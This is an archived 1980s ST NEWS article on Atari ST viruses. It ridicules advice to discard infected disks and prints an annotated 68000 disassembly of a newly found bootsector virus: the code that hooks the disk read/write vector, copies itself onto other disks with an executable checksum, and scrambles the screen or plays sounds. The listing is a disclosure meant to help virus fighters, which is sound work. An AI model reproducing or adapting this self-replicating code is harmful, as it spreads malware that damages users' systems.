THE ST'S VIRUS PART III by Richard Karsmakers
Guess what: The biggest nonsense about viruses was produced in
the month after the launch of the second article about viruses in
ST NEWS. Was I so dumb as to think that I had told everything
about the virus? Probably the guys of "Aticom" user group in
Nijmegen hadn't read any of the articles, for they advised their
members to throw away all infected disks (!). Even formatting, so
they added, wouldn't be enough anymore. Well, I don't think I
need to say that this is the biggest nonsense I have ever heard!
Why do people write virus killers? To let people throw away their
disks? No, Aticom! Using a viruskiller suffices in all cases
where an infected disk is concerned. Even formatting is not
necessary, let alone total destruction of the disk. It would be a
pity of someone who had just programmed months and months found a
virus on his work disk. If he had to throw the disk away, he
would be a sad man....Lucky for him, viruskillers exist.
The most stunning news of this time's ST NEWS is the fact that,
next to the old bootsector virus and the link-virus, a new
bootsector virus has been discovered. A documented listing is
added so that you exactly see what it can do...
03A80C BRA $03A82C
Here, the virus is initialised
03A82C MOVE.L $042E,A1 !Phystop to A1
03A830 SUBA.L #$00000300,A1 !Substract $300
03A836 LEA $03A80C(PC),A0 !Start of routine
At $3A80C, the bootsector is in memory at the moment
03A83A MOVE.W #$01DF,D5 !$1DF in D5
03A83E MOVE.B $00(A0,D5.W),$00(A1,D5.W)!Copy routine to pt-$300
03A844 DBF D5,$03A83E !Copy $1DF bytes
03A848 CLR.W $0006(A1) !Clr addr+6
03A84C MOVE.L $0476,$0002(A1) !Store old HDV_RW
03A852 ADDA.L #$000000D4,A1 !Address+D4 in A1
03A858 MOVE.L A1,$0476 !Set new HDV_RW
03A85C RTS !Ready!
On $300 under the physical top of RAM (just after screen memory
data), the virus is now installed:
-$300 The BRA to the virus
-$300+2 The address of the old HDV_RW
-$300+$D4 The adapted HDV_RW routine
03A85E LINK A6,#$FE00 !Reserve memory
03A862 MOVE.L A7,A5 !Define buffer
03A864 MOVE.W #$0008,D0 !$8 in D0
03A868 BSR $03A8C0 !Read bootsector
03A86A CMP.B (A5),D6 !CMP buffer with D6 =$60
03A86C BEQ $03A8BC !Already present?
On the address in A5, the bootsector of the new disk is present
03A86E MOVE.L A5,-(A7) !Buffer address on stack
03A870 LEA $03A80C(PC),A0 !Routine start in buffer
03A874 MOVE.W $03A80C(PC),(A5) !Put $601E at bufferstart
03A878 MOVE.W #$01C1,D5 !$1C1 in D5
03A87C MOVE.B $1E(A0,D5.W),$1E(A5,D5.W)!Routine to buffer
Now, the virus is copied from $1E to $1E+$1C1 in the buffer where
the bootsector of the new disk resides
03A882 DBF D5,$03A87C !Copy $1C1 bytes
03A886 CLR.W D7 !D7=0
03A888 CLR.W $01FE(A5) !CLR routine+$1FE
03A88C MOVE.W #$00FF,D5 !$FF to D5
03A890 ADD.W (A5)+,D7 !Make checksum in D7
03A892 DBF D5,$03A890 !With $FF bytes
03A896 MOVE.W #$1234,D0 !Sub sum from $1234
03A89A SUB.W D7,D0
03A89C MOVE.W D0,$FFFE(A5) !Buffer D0
03A8A0 MOVE.L (A7)+,A5 !Buffer address in A5
The checksum is now generated, that is put in the last two bytes
of the bootsector buffer. The disk is now infected AND executable
03A8A2 MOVE.W #$0009,D0 !9 flopwrite
03A8A6 BSR $03A8C0 !do it
03A8A8 TST.L D0 !D0 set?
03A8AA BMI $03A8BC !Negative? Exit
When this is negative, there was an error writing (e.g. a write-
protected disk)
03A8B0 ADDI.W #$0001,$001E(A0) !Add 1 to buffer
03A8B6 ADDI.W #$0001,$0006(A0) !Add 1 to buffer
03A8BC UNLK A6 !Memory back
03A8BE RTS
Routine to read/write the bootsector
03A8C0 MOVE.W #$0001,-(A7) !1 sector
03A8C4 CLR.W -(A7) !Side 0
03A8C6 CLR.W -(A7) !Track 0
03A8C8 MOVE.W #$0001,-(A7) !Sector 1
03A8CC MOVE.W $03A91E(PC),-(A7) !Device number
03A8D0 CLR.L -(A7) !Filler
03A8D2 MOVE.L A5,-(A7) !Buffer
03A8D4 MOVE.W D0,-(A7) !$8/9, flopread/write
03A8D6 TRAP #14 !Execute it
03A8D8 ADDA.L #$00000014,A7 !Correct stack
03A8DE RTS !Return
The next disk is now infected. The following routine is the
actual virus. De HDV_RW is vectored to this address
03A8E0 LEA $03A91E(PC),A0 !Get buffer address
03A8E4 MOVE.W $000E(A7),D0 !Get devno from stack
03A8E8 MOVE.W D0,(A0) !Put in buffer
03A8EA ANDI.W #$FFFE,D0 !
03A8EE BEQ $03A8F6 !To 3A8F6 if dev=0/1
03A8F0 MOVE.L $03A80E(PC),A0 !Old HDV_RW vector
03A8F4 JMP (A0) !Execute it
This is a suspicious routine
03A8F6 MOVE.W $000C(A7),D0 !Logical sector in D0
03A8FA CMPI.W #$000B,D0 !$0B? (Directory)
03A8FE BNE $03A8F0 !Not, then safe!
03A900 MOVEM.L D0-A6,-(A7) !SAVE registers
03A904 MOVE.W $03A812(PC),D0 !Counter to D0
03A908 CMPI.W #$0005,D0 !Counter already 5?
03A90C BLE $03A910 !Branch less or equal
After the counter is put to 5, the virus only checks if it's
present, and multiplies if needed. Otherwise, the screen is
scrambled or something of that kind
03A90E BSR $03A920 !Scramble screen
03A910 MOVE.B #$60,D6 !$60 in D0
03A914 BSR $03A85E !Check for virus
03A918 MOVEM.L (A7)+,D0-A6 !Get back registers
03A91C BRA $03A8F0 !Execute old HDV_RW
03A91E $00, $00 !This is a buffer
Things go wrong here
03A920 CLR.W D0 !Clear D0
03A922 MOVE.B $0465,D0 !lowest byte of _vbclock
03A926 ANDI.B #$07,D0 !Only 3 lowest bits
D0 now contains a random number between 0 and 7. This number will
now speicfy which routine will be called
03A92A LEA $03A9DA(PC),A0 !Offset table
03A92E MOVE.B $00(A0,D0.W),D0 !Offset to D0
03A932 LEA $03A93A(PC),A0 !First routine address
03A936 ADDA.W D0,A0 !Add D0 to it
03A938 JMP (A0) !Execute it
Routine #1 (offset=0) !Invert part of screen
03A93A MOVE.L $044E,A0 !_v_bas_ad to A0
03A93E MOVE.W #$1F3F,D5 !$1F3F to D5
03A942 EORI.L #$FFFFFFFF,(A0)+ !Invert screen
03A948 DBF D5,$03A942 !$1F3F bytes
03A94C RTS
Routine #2 (offset=$14) !Scroll screen
03A94E MOVE.W #$003F,D0 !$3F in D0
03A952 MOVE.L $044E,A0 !_v_bas_ad to A0
03A956 MOVE.W #$3E7F,D5 !3E7f to D5
03A95A ROL (A0)+
03A95C DBF D5,$03A95A !Copy something
03A960 DBF D0,$03A952
03A964 RTS
Routine #3 (offset=$2C) !Skramble screen
03A966 BSR $03A96A !Skramble scherm
03A96A MOVE.L $044E,A0 !_v_bas_ad to A0
03A96E MOVE.L A0,A1 !Also to A1
03A970 ADDA.L #$00003E80,A1 !Add $3E80 to A1
03A976 MOVE.W #$3E7F,D5 !$3e7F to D5
03A97A MOVE.B (A0),-(A7) !
03A97C MOVE.B (A1),-(A7)
03A97E MOVE.B (A7)+,(A0)+
03A980 MOVE.B (A7)+,(A1)+
03A982 DBF D5,$03A97A
03A986 RTS
Routine #4 (offset=$4E) !Tutti Frutti
03A988 BSR $03A93A !Invert part of screen
03A98A BSR $03A94E !Scroll screen
03A98C BSR $03A966 !Skramble screen
03A98E RTS
Routine #5 (offset=$56) !19 times screen invert
03A990 MOVE.W #$0013,D0
03A994 BSR $03A93A !Invert Screen Part
03A996 DBF D0,$03A994 !19 times
Routine #6 (offset=$60) Part of routine #5
03A99A BSR $03A96A !Skramble scherm
03A99C MOVE.W #$0096,D0 !$96 cycles
03A9A0 BSR $03A9CC !Pause
03A9A2 BSR $03A96A !Skramble scherm
03A9A4 RTS
Routine #7 (offset=$6C) !Move screen memory
03A9A6 ORI.B #$10,$FF8201 !Screen memo OR $10
03A9AE MOVE.W #$00C8,D0 !$C8 cycles
03A9B2 BSR $03A9CC !Pause
03A9B4 ANDI.B #$EF,$FF8201 !Put it back
03A9BC RTS
Routine #8 (offset=$84) !Make a sound
03A9BE PEA $03A9E2(PC) !Pointer
03A9C2 MOVE.W #$0020,-(A7) !Dosound
03A9C6 TRAP #14
03A9C8 ADDQ.L #6,A7 !Correct stack
03A9CA RTS
Pause
03A9CC MOVE.W $04BC,D1 !High word of _hz_200
03A9D0 ADD.W D0,D1 !Add D0 to that
03A9D2 CMP.W $04BC,D1 !Wait until equal
03A9D6 BGE $03A9D2
03A9D8 RTS
Offset bytes (routines 1-8)
03A9DA $00, $14, $2C, $4E, $56, $60, $6C, $84
Dosound data
03A9E2 $07, $FE, $08, $0F, $81, $00, $04, $00, $FF, $00
Channel A on, volume maximal, make sound, end sound
I am very sorry that the addresses are a bit awkward, but this is
a disassembled listing of a virus bootsector in a disk
monitor's disk buffer. Hence the strange addresses.
If this virus is an example of the trend among Atari ST users,
it's bad news. It might be that this particular virus is
virtually innocent, but it still IS a virus! Add to that the
rumour that Data Becker is publishing "The Big Virus Book", and
one tends to feel rather depressed....
A new version of the "Virus Destruction Utility" is talked about
in the "VDU Update" article. Please refer to that if you want to
take part of the battle against viruses - which you should!!
Disclaimer
The text of the articles is identical to the originals like they appeared
in old ST NEWS issues. Please take into consideration that the author(s)
was (were) a lot younger and less responsible back then. So bad jokes,
bad English, youthful arrogance, insults, bravura, over-crediting and
tastelessness should be taken with at least a grain of salt. Any contact
and/or payment information, as well as deadlines/release dates of any
kind should be regarded as outdated. Due to the fact that these pages are
not actually contained in an Atari executable here, references to scroll
texts, featured demo screens and hidden articles may also be irrelevant.